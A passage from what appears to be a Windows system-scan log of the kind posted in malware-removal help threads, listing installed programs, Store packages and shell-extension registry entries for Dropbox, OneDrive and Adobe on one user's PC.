Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{9634d50a-0c4d-4f52-8a9f-894a2baae370}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{307a22b8-8353-4c5e-b67b-2404c5734558}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27033 (HKLM-x32\...\{cc3a7c63-31fb-4129-9024-63ebefd86a95}) (Version: 14.16.27033.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27033 (HKLM-x32\...\{624ba875-fdfc-4efa-9c66-b170dfebc3ec}) (Version: 14.16.27033.0 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.18.1104.625 - Microsoft Corporation)
MMFonts (HKLM-x32\...\{1DD5D3E6-8DF5-4657-8825-713C499CDCC0}) (Version: 1.1.1.1 - MakeMusic, Inc.)
Mozilla Firefox 61.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 61.0.2 (x86 en-US)) (Version: 61.0.2 - Mozilla)
Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 64.0.2 - Mozilla)
Mp3tag v2.84a (HKLM-x32\...\Mp3tag) (Version: 2.84a - Florian Heidenreich)
MSI Development Tools (HKLM-x32\...\{577FB968-1AAC-A315-93D6-419725A69F36}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
MSI Development Tools (HKLM-x32\...\{6C961B30-A670-8A05-3BFE-3947E84DD4E4}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
Native Instruments Kontakt 5 (HKLM-x32\...\Native Instruments Kontakt 5) (Version: 5.7.3.37 - Native Instruments)
Network Addon Mod (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Network Addon Mod) (Version: 36 - The NAM Team)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.8 - Notepad++ Team)
NovaGOPlayer 7.3.3 (HKLM-x32\...\89399A59-11C3-4EBC-A59E-FBD13021BC07_is1) (Version: 7.3.3 - Forthnet Media SA)
NVAPI Monitor plugin for NvContainer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvContainer.NvapiMonitor) (Version: 1.15 - NVIDIA Corporation) Hidden
NVIDIA 3D Vision Controller Driver 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 397.93 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.19.0.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.19.0.94 - NVIDIA Corporation)
NVIDIA Graphics Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 397.93 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.37.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.37.4 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
OANDA - MetaTrader (HKLM-x32\...\OANDA - MetaTrader) (Version: 4.00 - MetaQuotes Software Corp.)
OANDA Desktop (HKLM-x32\...\{1DAF3BB8-E27F-4698-9D7C-270985AA3BCE}) (Version: 2.6.3 - OANDA)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0408-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
PACE License Support Win64 (HKLM\...\{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.) Hidden
PACE License Support Win64 (HKLM-x32\...\InstallShield_{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.)
PCM Native Reverb VST Plug-in (HKLM-x32\...\{B4691C58-2A6A-4AFA-960E-AEB767639E44}) (Version: 1.0.0 - Lexicon) Hidden
PCM Native Reverb VST Plug-in (HKLM-x32\...\PCM Native Reverb VST Plug-in) (Version:  - Lexicon)
PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.5.2 - pdfforge GmbH)
PMDG 737 8900 NGX Base Package FSX (HKLM-x32\...\{20708FD5-E94D-4097-A21E-E28564CDBC06}) (Version: 1.10.6436 - PMDG Simulations, LLC.)
PureSync (HKLM-x32\...\{728DB5F9-AFAC-4027-B0A0-4194D89328E4}) (Version: 4.7.3 - Jumping Bytes)
qBittorrent 4.1.6 (HKLM-x32\...\qBittorrent) (Version: 4.1.6 - The qBittorrent project)
Quick Search 5.28.1.101 (HKLM-x32\...\Quick Search) (Version: 5.28.1.101 - Glarysoft Ltd)
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
RapidMiner Studio (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\RapidMiner Studio) (Version: 7.6.1.0 - RapidMiner)
RealAir Turbine Duke (HKLM\...\Turbine Duke07.1.10.35) (Version: 07.1.10.35 - RealAir Simulations)
Revolution DB Master 19 Beta 1 (HKLM-x32\...\Revolution DB Master 19_is1) (Version:  - FIFA MASTER)
REX 4 - Weather Architect (HKLM-x32\...\{1D59EFDF-0A58-4FF9-A468-A1190F1FAFEB}) (Version: 4.0.2015.0717 - REX Game Studios, LLC.)
rtpMIDIBlockLegacy (HKLM-x32\...\{FD937297-84C3-41A5-B5DF-1FAEEE669D68}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden
SafeZone Stable 3.55.2393.609 (HKLM-x32\...\SafeZone 3.55.2393.609) (Version: 3.55.2393.609 - Avast Software) Hidden
Sandboxie 5.30 (64-bit) (HKLM\...\Sandboxie) (Version: 5.30 - Sandboxie Holdings, LLC)
Scid vs PC 4.18 (HKLM-x32\...\Scid vs PC_is1) (Version: 4.18 - Steven Atkinson)
Screen Protractor (HKLM-x32\...\Screen Protractor) (Version: 4.0 - Iconico)
SDK ARM Additions (HKLM-x32\...\{0B5D6FB7-05A5-271B-5B99-82384219A471}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SDK ARM Redistributables (HKLM-x32\...\{4A5F6E94-7967-A333-8231-CA9AF35E03BD}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SimCity (HKLM-x32\...\SimCity_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
SimCity 4 Deluxe Edition (HKLM-x32\...\GOGPACKSC4_is1) (Version: 2.0.0.8 - GOG.com)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
SumatraPDF (HKLM\...\SumatraPDF) (Version: 3.1.2 - Krzysztof Kowalczyk)
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.2.36215 - TeamViewer)
teVirtualMIDI64 (HKLM\...\{9084640A-366B-4C44-BDB1-74864B460B13}) (Version: 1.2.10.38 - Tobias Erichsen) Hidden
thinkorswim (HKLM\...\9968-4488-2169-7623) (Version: desktop - thinkorswim, Inc)
Traffic Simulator Configuration Tool (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Traffic Simulator Configuration Tool) (Version:  - )
TypeScript SDK (HKLM-x32\...\{3CBDDAE8-99AE-4168-BDA7-8352BF15BE73}) (Version: 3.1.2.0 - Microsoft Corporation) Hidden
TypeScript SDK (HKLM-x32\...\{CFA1F87E-EF2B-4785-812C-4BEEA22CFD06}) (Version: 2.3.5.0 - Microsoft Corporation) Hidden
UltraSearch V2.3 (64 bit) (HKLM\...\UltraSearch_is1) (Version: 2.3 - JAM Software)
Unity (HKLM-x32\...\Unity) (Version: 5.6.3p1 - Unity Technologies ApS)
Universal CRT Extension SDK (HKLM-x32\...\{1FBCBC17-4527-2340-0832-B1D49C41FF67}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{7D225043-6CC5-7B56-11DD-AFF90E4C1C0C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{BE2D1829-B45D-4D78-BF02-4076B86AC57C}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{8BFBEC30-33CC-13B4-849F-3B036F27466A}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{A46D1F7A-BA32-2375-EF97-4975E594A7E7}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{CB19DBA2-C210-5646-9522-695A1317CD34}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{413A1F9C-9349-4847-610E-BAB177A48ADE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{5F577A45-3C65-352B-061D-D6A57F05402C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{3B588BBE-EB02-D1B2-5CD5-7DB85AD8A3E7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{D2DC1EDF-EE04-9B5F-BDD7-06645D859EC3}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{CE83D0BD-418A-F3D1-D6CE-687E96D1EBD0}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{E2EA2702-534B-D6C1-5AC4-724E3CE7B2D9}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal Patch Finder version 1.5 (HKLM-x32\...\{88FBB3D2-C9A5-41E4-88B8-3F4F1722E7D1}_is1) (Version: 1.5 - Hypercube Softwares)
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{9C4F3AF4-21D8-43BD-A69C-517BB96012CF}) (Version: 2.12.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM-x32\...\{B302EECB-0DA5-46E6-8A58-127440F22CF1}) (Version: 1.7.0.0 - Microsoft Corporation) Hidden
VBSBeautifier (remove only) (HKLM-x32\...\VBSBeautifier) (Version:  - )
vcpp_crt.redist.clickonce (HKLM-x32\...\{253D6AD3-5786-4B3B-B4E1-E082482A1F26}) (Version: 14.16.27033 - Microsoft Corporation) Hidden
VeraCrypt (HKLM-x32\...\VeraCrypt) (Version: 1.21 - IDRIX)
Viber (HKLM-x32\...\{32AF88A9-E104-4306-8B68-CB92FFD2CAD6}) (Version: 11.0.0.42 - Viber Media S.a.r.l) Hidden
Viber (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\{9097b5b3-1f2b-4ff7-a350-97a76bb76fb8}) (Version: 11.0.0.42 - Viber Media S.a.r.l)
Visual Studio Community 2017 (HKLM-x32\...\fba7c5bd) (Version: 15.9.28307.905 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
VoiceBot 3.0 (HKLM-x32\...\2BB5202A-885B-454F-8624-FD3310CD3225_is1) (Version: 3.0.0.0 - Binary Fortress Software)
VS Immersive Activate Helper (HKLM-x32\...\{54FBC9A9-CCA1-417E-ACA6-203A32A39F37}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS JIT Debugger (HKLM\...\{4B816AD0-D12B-498A-8148-7CBE3ED328DE}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS Script Debugging Common (HKLM\...\{8B657335-3813-4CF4-A6FE-2AA44BE23F94}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
vs_BlendMsi (HKLM-x32\...\{C5D83E0F-12E7-4BA3-98E6-DAE0E73B5BF9}) (Version: 15.0.27205 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsi (HKLM-x32\...\{A68D7884-F036-4A0D-AE1A-410E0311E135}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsires (HKLM-x32\...\{91DDDFB5-1782-48C2-BA2A-8F4D9DE39D27}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncesigntoolmsi (HKLM-x32\...\{6A1ECF65-2CBF-4B33-9D4A-D1C0A0E5FE45}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_communitymsi (HKLM-x32\...\{71797C29-380A-492C-B35A-F5E4A7B57BDC}) (Version: 15.9.28307 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{40040E64-50EB-4FCF-B209-DA0B20821759}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{BFFA2FFB-1095-4ADD-A352-368806D2412B}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{A254DA0E-26A1-43C3-95BE-7A24D5599473}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{1F42A73E-CF26-4D67-BA79-752CA56B639F}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{A41E138F-5A3F-443C-B72D-957AB994FB5A}) (Version: 15.9.28128 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx64 (HKLM\...\{B6BAC9A6-A70D-4E4D-B90A-7EE2B336E090}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx86 (HKLM-x32\...\{3161DA68-DD37-4798-82DB-B3A0BD6BA233}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{3A78DA3D-C8D4-429D-B536-6E59A0088451}) (Version: 15.8.27825 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{68B8AD33-CE97-4C3D-9583-669C39D21BA5}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{6DFE6F8D-B61D-4348-AB70-4ABF1210DFD5}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_SQLClickOnceBootstrappermsi (HKLM-x32\...\{5779B6DD-604A-41CE-BC3D-9D4BDDA22AD2}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_tipsmsi (HKLM-x32\...\{1AC6CC3D-7724-4D84-9270-798A2191AB1C}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
Weka 3.8.3 (HKLM\...\Weka 3.8.3) (Version: 3.8.3 - Machine Learning Group, University of Waikato, Hamilton, NZ)
WinAppDeploy (HKLM-x32\...\{03343DEA-224B-E9B6-1FBB-E637E6BC6BAA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinAppDeploy (HKLM-x32\...\{716AE8F2-1BE3-7657-DF6B-F23DEEC75AF9}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinAutomation (HKLM\...\{67F5E390-8E09-4AE4-B7F2-705AFD23D86D}) (Version: 6.0.2.4227 - Softomotive Ltd) Hidden
WinAutomation (HKLM-x32\...\WinAutomation) (Version: 6.0.2.4227 - Softomotive Ltd)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22211 - Microsoft Corporation)
Windows SDK AddOn (HKLM-x32\...\{E1C6F438-7C50-41F5-8B47-3CC96D397CA3}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version:  - )
Windows Software Development Kit - Windows 10.0.15063.674 (HKLM-x32\...\{6824cee4-b358-4633-b82c-5f20894af8e2}) (Version: 10.1.15063.674 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.17763.132 (HKLM-x32\...\{5fe95b9d-9219-4d8b-a031-71323ae48a81}) (Version: 10.1.17763.132 - Microsoft Corporation)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{00B12DF9-5428-9406-DE2C-8E8A1A062B05}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{D8AA52A2-81E2-BB84-AAF9-C487C586CC15}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{5715A2A6-E637-81E3-464D-3F0F999E506A}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{E82A4A6C-C21C-35FE-B805-3E44318F6D63}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{2B8614A6-D0C1-CFE0-9311-7AF9227DC9BA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{7E898893-9C42-A572-7F57-FDE55CE812F7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{409D68FF-37DD-F8F4-A60F-30BEAA4AA4CE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{E8B1CB29-5C24-D882-3CEF-F8A7263BC63D}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{F6F11150-93DE-0507-FCA0-F746E0207017}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{3617F573-CF51-0F5A-063F-B272F98D0522}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{8329C3A0-8582-D1C2-67FF-800654BFDF45}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{771C9DEF-7C0B-85DA-6426-7A20F06BEC94}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{FDE59EF8-D43D-F9DA-5B0C-CC9C90DB0335}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{87CC4887-0873-F87B-D804-6A78B07DC1F5}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{B047C746-63E8-41C7-A5C0-7ABD390CF3E6}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{0063AF94-397B-9C64-1C71-D404B27C5D96}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{D62E0DD5-9853-C09C-AE15-D02988503C60}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
wxWidgets 3.0.4 (HKLM-x32\...\wxWidgets_is1) (Version:  - wxWidgets)
X-Mouse Button Control 2.18.8 (HKLM-x32\...\X-Mouse Button Control) (Version: 2.18.8 - Highresolution Enterprises)
ZBrush 4R7 (HKLM-x32\...\ZBrush 4R7 4R7) (Version: 4R7 - Pixologic)

Packages:
=========
Mail and Calendar -> C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12228.20206.0_x64__8wekyb3d8bbwe [2019-11-20] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad]
Microsoft News -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.33.13094.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation) [MS Ad]
Microsoft Phone Companion -> C:\Program Files\WindowsApps\Microsoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe [2018-11-13] (Microsoft Corporation)
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.11052.0_x64__8wekyb3d8bbwe [2019-11-10] (Microsoft Studios) [MS Ad]
MSN Money -> C:\Program Files\WindowsApps\Microsoft.BingFinance_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad]
MSN Sports -> C:\Program Files\WindowsApps\Microsoft.BingSports_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad]
MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.33.13253.0_x64__8wekyb3d8bbwe [2019-11-23] (Microsoft Corporation) [MS Ad]
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{23066764-9BDD-4FBD-8B1F-F4547CF2684F}\InprocServer32 -> C:\Users\SR\AppData\Local\Microsoft\OneDrive\18.070.0405.0002\amd64\FileSyncShell64.dll => No File
CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{E31EA727-12ED-4702-820C-4B6445F28E1A} -> [Dropbox] => C:\Users\SR\Dropbox [2018-01-03 12:23]
ShellIconOverlayIdentifiers: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers-x32: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
